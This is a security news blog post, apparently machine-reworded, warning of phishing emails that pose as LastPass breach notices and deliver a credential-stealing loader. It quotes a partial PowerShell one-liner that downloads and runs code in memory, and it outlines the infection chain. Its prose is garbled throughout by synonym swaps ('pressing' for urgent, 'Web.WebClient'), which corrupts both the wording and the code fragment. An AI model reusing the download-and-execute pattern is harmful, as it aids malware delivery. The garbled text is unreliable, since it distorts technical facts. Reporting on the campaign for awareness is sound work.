Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Beware of Fake ‘LastPass Hack’ Emails Trying to Trick Users Into Installing Malware

Posted on October 16, 2025October 16, 2025 By CWS

Cybersecurity professionals are elevating alarms over a brand new wave of phishing emails masquerading as breach notifications from LastPass.

These messages warn recipients of an pressing account compromise and urge them to obtain a “safety patch” to revive entry.

In actuality, the downloadable file incorporates a classy malware loader designed to reap credentials and deploy extra payloads.

The scheme has been energetic since early October and has already ensnared a number of enterprise customers.

The emails leverage acquainted LastPass branding, full with firm logos and hyperlinks that seem to direct victims to official domains.

Nonetheless, nearer inspection reveals delicate URL manipulations that redirect customers to attacker-controlled servers internet hosting malicious executables.

LastPass analysts recognized the marketing campaign after observing a number of customers reporting surprising login failures and anomalous community visitors shortly after clicking the hyperlinks.

Every phishing e mail attaches a ZIP archive named “LastPass_Security_Update.zip” containing an executable disguised as an MSI installer.

When launched, the MSI drops a PowerShell script within the person’s AppData folder and executes it by way of a scheduled process.

This script reaches out to a distant command-and-control server to obtain a second-stage payload, which is able to keylogging, screenshot seize, and lateral motion inside company networks.

An infection Mechanism

The core of the assault revolves round a crafted PowerShell command that downloads and executes the loader with out writing the script to disk. A snippet of the obfuscated command is proven under:-

IEX(New-Object Web.WebClient).DownloadString(‘

This one-liner makes use of IEX to execute the downloaded content material immediately in reminiscence, evading most antivirus options.

Phishing e mail (Supply – LastPass)

The loader then injects a DLL into svchost.exe to take care of persistence and bypass software whitelisting.

This marketing campaign underscores the significance of verifying e mail authenticity, using multi-factor authentication, and monitoring for uncommon PowerShell exercise in enterprise environments.

Observe us on Google Information, LinkedIn, and X to Get Extra Immediate Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:Beware, Emails, Fake, Hack, Installing, LastPass, Malware, Trick, Users

Post navigation

Previous Post: LinkPro Linux Rootkit Uses eBPF to Hide and Activates via Magic TCP Packets
Next Post: Microsoft Revokes Over 200 Certificates to Disrupt Ransomware Campaign

Related Posts

Chrome Extensions Vulnerability Exposes API Keys, Secrets, and Tokens Cyber Security News
Lumma Affiliates Using Advanced Evasion Tools Designed to Ensure Stealth and Continuity Cyber Security News
Water Saci Hackers Leveraging AI Tools to Attack WhatsApp Web Users Cyber Security News
Top 3 Evasion Techniques In Phishing Attacks: Real Examples Inside  Cyber Security News
Renting Android Malware With 2FA Interception, AV Bypass is Getting Cheaper Now Cyber Security News
VS Code Extension Weaponized With Two Lines of Code Leads to Supply Chain Attack Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Marquis Data Breach Impacts Over 780,000 People
  • Hackers Using Evilginx to Steal Session Cookies and Bypass Multi-Factor Authentication Tokens
  • React2Shell: In-the-Wild Exploitation Expected for Critical React Vulnerability
  • GoldFactory Hits Southeast Asia with Modified Banking Apps Driving 11,000+ Infections
  • Hackers Leverage Velociraptor DFIR Tool for Stealthy C2 & Ransomware Delivery

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Marquis Data Breach Impacts Over 780,000 People
  • Hackers Using Evilginx to Steal Session Cookies and Bypass Multi-Factor Authentication Tokens
  • React2Shell: In-the-Wild Exploitation Expected for Critical React Vulnerability
  • GoldFactory Hits Southeast Asia with Modified Banking Apps Driving 11,000+ Infections
  • Hackers Leverage Velociraptor DFIR Tool for Stealthy C2 & Ransomware Delivery

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2025 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark